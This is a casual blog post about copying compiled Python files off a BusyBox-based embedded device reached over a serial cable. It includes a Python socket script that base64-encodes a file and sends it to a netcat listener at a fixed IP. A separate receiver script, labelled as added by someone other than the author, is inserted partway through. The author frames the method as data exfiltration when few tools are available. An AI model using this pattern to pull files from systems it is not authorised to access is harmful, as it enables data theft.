From the "in case I need to do this again" archives
So recently I got access to an embedded Linux system via a soldered-on serial cable, and on this system there were a bunch of compiled Python bytecode files that I really wanted to look at. While it had network access, there were a couple of hurdles to get over.
- It was running a really old version of BusyBox that was lacking all of the tools that would make this easy (no netcat, no scp, no FTP client, no TFTP client).
- Very limited space, so statically compiling binaries and attempting to copy them across was going to be touch and go.
- Nothing on the device would let me do any analysis without first moving the files off the box.
After digging around, the only thing I found was Python and a handful of libraries, so I knew we were good :)
Given I have no idea if any of these files have nulls in them, the best bet was to base64 those bad boys then spit them out onto the wire. This means I don't have to worry about truncating any transfers or filling up the couple of meg I have on the storage.
Boom, quick and dirty Python 5-liner.
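import sys, base64, socket
input = open(sys.argv[1], "rb").read()  # file to send, read as raw bytes
s = socket.socket()
s.connect( ("192.168.0.99", 1900) )  # address and port of the netcat listener
s.sendall(base64.b64encode(input))  # base64 on the wire, decoded by base64 -d on the listener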
Set up your netcat listener on the address specified.
nc -l 1900 | base64 -d > somefile
and call your script.
Robert's a good friend of your aunt.
Yes, yes as with all my code this can be improved upon, but I think you're missing the point: Backed into the corner, quick and dirty.*
I was lucky this time that Python was installed, going to look at other ways to exfil data with naff all tools. If you have any suggestions, drop me a line.
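For the listening side, here is an added example (not the author's code) that stands in for the `nc -l 1900 | base64 -d` pipeline and refuses to write a file when the base64 stream arrives cut short or corrupted. The function names and the `recv.py` file name are assumptions made for this example.

```python
import base64
import binascii
import hashlib
import socket
import sys


def decode_transfer(stream):
    """Decode a received base64 stream; raise ValueError if it looks cut short."""
    # Drop newlines or spaces that a sender or terminal may have inserted.
    compact = b"".join(stream.split())
    if not compact:
        raise ValueError("empty transfer")
    if len(compact) % 4:
        # A complete base64 stream is always a multiple of 4 characters long.
        raise ValueError("truncated transfer: %d base64 chars" % len(compact))
    try:
        data = base64.b64decode(compact, validate=True)
    except binascii.Error as exc:
        raise ValueError("corrupt transfer: %s" % exc)
    return data, hashlib.sha256(data).hexdigest()


def receive_once(port, host="0.0.0.0"):
    """Accept one connection and return everything sent until the peer closes."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    conn, _peer = srv.accept()
    chunks = []
    while True:
        chunk = conn.recv(65536)
        if not chunk:  # peer closed the socket: transfer finished
            break
        chunks.append(chunk)
    conn.close()
    srv.close()
    return b"".join(chunks)


if __name__ == "__main__":
    # Usage: python recv.py 1900 somefile
    data, digest = decode_transfer(receive_once(int(sys.argv[1])))
    with open(sys.argv[2], "wb") as out:
        out.write(data)
    print("%d bytes written, sha256 %s" % (len(data), digest))
```

A stream that happens to be cut on a 4-character boundary still passes the length check, so compare the printed SHA-256 against one computed on the device if its Python ships hashlib.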
* Coincidentally this is just how your mum likes it.**
** Possibly a lie